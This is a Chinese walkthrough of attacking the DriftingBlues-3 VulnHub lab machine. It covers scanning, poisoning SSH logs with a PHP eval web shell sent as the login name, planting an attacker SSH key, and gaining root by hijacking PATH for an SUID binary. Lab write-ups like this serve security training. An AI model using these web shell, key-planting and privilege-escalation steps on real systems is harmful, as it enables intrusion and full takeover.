关于我渗透dirftingblues-3靶机这档事

dirftingblue3靶机实战渗透测试

环境配置

靶机下载地址:https://download.vulnhub.com//driftingblues/driftingblues3.ova

靶机IP:172.16.9.173 攻击机IP:172.16.9.174

渗透过程

首先对靶机进行nmap扫描nmap -sV -p- 172.16.9.173 image-20211130205951351

80端口开启,使用dirb工具对其目录进行扫描,并且访问其主页. dirb http://172.16.9.173/ image-20211130210148804 发现其主页没有什么线索,然后查看dirb扫描的结果 image-20211130210302432 发现robots.txt和多个框架存在.然后逐一对其进行访问. image-20211130210431466 image-20211130210502161 image-20211130210523613 image-20211130210541163 image-20211130210559205 image-20211130210744775 image-20211130210627571

发现扫描的结果外,除了robots.txt中有有用信息,其他都是无用的信息,访问robots.txt中给出的文件** image-20211130210914455ssh 有问题约翰说:“有毒!!!远离!!!”idk 如果他有精神上的挑战请找到并修复它还要检查 /littlequeenofspades.html你的哥们哥(网页翻译大致为)网页有提到ssh和另一个页面,我们继续访问另一个页面/littlequeenofspades.html image-20211130211047199 一开始看到这个网页的时候,以为只是简单的提示,但是我选中CTRL+A进行全选的时候,居然发现了隐藏的base64加密的字符串.好家伙,我直接好家伙

image-20211130211157232选中base64的字符串进行解密.

image-20211130211306199

解密完之后又出现了一个新的页面,访问这个页面发现是一个ssh的登陆日志

image-20211130211359756 **尝试发现ssh登陆时哪些信息会显示在日志中,首先登陆ssh服务器ssh test@172.16.9.173 **发现test用户名会出现在日志中** image-20211130211604325 **构造一句话木马<?php @eval($_POST[cmd]);?>登陆ssh服务器ssh '<?php @eval($_POST[cmd])'?>'@172.16.9.173 image-20211130211751875 image-20211130211855572 php一句话木马写入成功,尝试用蚁剑进行连接一句话木马. image-20211130212021571

提权普通用户

连接进入靶机.尝试提权,但是发现home目录下还有一个用户robertj,并且用户的家目录下有user.txt,猜测可能需要先获得这个用户的权限.然后发现robertj用户的.ssh目录是可以进入并且可读可写可执行 image-20211130212433932 然后尝试ssh免密码登陆这个用户,将攻击机Kali的/root/authorized_keys文件内容复制进入/home/robertj/.ssh/authorized_keys中,即可实现ssh免密码登陆. image-20211130212919646 image-20211130212942878

然后就可以用攻击机进行ssh连接.

image-20211130213001988成功登陆靶机之后,就可以查看到第一个user.txt

image-20211130213054465

提权Root用户

**然后输入命令查看哪些命令有suid权限find / -user root -perm -4000 2>/dev/null image-20211130213153069 **发现有一个很奇怪的命令为getinfo,尝试使用该命令,发现为ifconfig+cat /etc/hosts + uname -a,猜测提权的突破口在这里. **尝试利用getinfo进行提权** image-20211130213528154 创建一个名为IP的文件,然后赋予其777的权限,然后将环境变量移动到/home/robertj目录下,然后执行getinfo命令进行提权,这样执行getinfo的命令时,会以root的权限执行ip命令,我们就可以拿到root权限的shell**

image-20211130213706649 image-20211130213820792 提权命令 echo "/bin/bash" > ip chmod 777 ip export PATH=/home/robertj:$PATH

总结:

这个系列的靶机还是非常的有意思的!咱下个靶机driftingblue4再见!!! 欢迎大佬们指出小弟的不足!

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐